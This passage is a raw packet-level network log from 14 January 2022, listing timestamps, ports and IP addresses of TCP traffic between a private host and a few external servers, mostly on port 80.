Jan 14, 2022 00:16:09.739442110 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739464998 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739480019 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739530087 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739569902 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739619017 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739619970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.739634991 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739636898 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739667892 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739706993 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739747047 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739747047 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739784002 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739837885 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739837885 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739877939 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739907980 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739917994 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739954948 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739993095 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739993095 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.740031958 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.740071058 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.740086079 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.740123034 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.740319967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.740535975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.740622997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.740714073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.740848064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.740998983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.741004944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.741126060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.741334915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.741342068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.741595984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.741601944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.741719961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.741884947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.741899014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.742031097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.742157936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.742177963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.742285013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.742651939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.742748976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.742839098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.742935896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.755579948 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.756150961 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.775762081 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.784049988 CET	49908	38133	192.168.2.4	86.107.197.138
Jan 14, 2022 00:16:09.784982920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.785135031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.785222054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.785310984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.785518885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.785533905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.785639048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.785749912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.785886049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.785902023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786062002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786077023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786165953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786257029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786346912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786619902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786751032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786767960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786880016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.786957026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787110090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787126064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787220955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787328005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787489891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787504911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787647963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787664890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787761927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787898064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.787971020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788029909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788161993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788247108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788434029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788450003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788558006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788620949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788702965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788795948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.788914919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789024115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789066076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789155960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789252996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789386988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789519072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789648056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789664984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789829016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789844036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.789947987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.790008068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.790196896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.790214062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.790318012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.790469885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.790478945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.790478945 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790518999 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790574074 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790613890 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790621042 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.790652990 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790673018 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.790709019 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790746927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.790749073 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790790081 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790802956 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.790827036 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790842056 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.790867090 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790905952 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790944099 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790982962 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.790983915 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791022062 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791022062 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791062117 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791074991 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791101933 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791130066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.791140079 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791155100 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791179895 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791219950 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791228056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.791235924 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791259050 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791297913 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791337013 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791363955 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791371107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.791377068 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791414976 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791429043 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791470051 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791500092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.791507959 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791526079 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791548014 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791563034 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791587114 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791625023 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791640043 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791665077 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791675091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.791702986 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791742086 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791757107 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791786909 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791794062 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791848898 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791887045 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791903973 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.791927099 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.791965961 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792001963 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792016029 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792042017 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792042017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.792056084 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792081118 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792130947 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792157888 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792171001 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792208910 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792249918 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792263985 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792292118 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792304993 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792330027 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792370081 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792408943 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792423010 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792445898 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792459965 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792485952 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792525053 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792565107 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792582035 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792615891 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792617083 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792655945 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792694092 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792732954 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792746067 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792773008 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792788982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.792812109 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792812109 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792851925 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792865992 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.792890072 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792929888 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792968035 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.792984009 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793005943 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793019056 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793045044 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793083906 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793100119 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793123007 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793164015 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793198109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.793204069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.793226957 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793230057 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793267965 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793308020 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793322086 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793349028 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793363094 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793385983 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793426037 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793462992 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793463945 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793478012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.793517113 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793534040 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793560028 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793586016 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793612957 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793634892 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793641090 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793668032 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793670893 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793694973 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793721914 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793746948 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793749094 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793776989 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793792009 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793802977 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793831110 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793855906 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793876886 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793883085 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793905020 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793922901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.793932915 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793956995 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.793958902 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.793986082 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.794013977 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.794039965 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.794056892 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.794065952 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.794095993 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.794116974 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.794830084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.794986010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.794992924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795198917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795217991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795316935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795483112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795499086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795667887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795681953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795783043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795851946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.795954943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.796138048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.796152115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.796339035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.796354055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.796513081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.796550989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.796744108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.796757936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.796849966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.797041893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.797059059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.797137976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.797342062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.797358036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.798681021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.798751116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.798813105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.798949003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.799117088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.799133062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.799232006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.799319029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.799448967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.812309980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.812439919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.812525988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.812624931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.812710047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.812819004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.812947989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.813002110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.813150883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.813165903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.813322067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.814198017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.814383984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.814445019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.814537048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.814632893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.814722061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.814850092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.814923048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815002918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815150023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815166950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815335989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815354109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815464020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815572977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815654039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815764904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815851927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.815953016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.816046000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.816189051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.816304922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.816421986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.816488028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.838861942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839073896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839092016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839184046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839345932 CET	49902	80	192.168.2.4	185.215.113.35
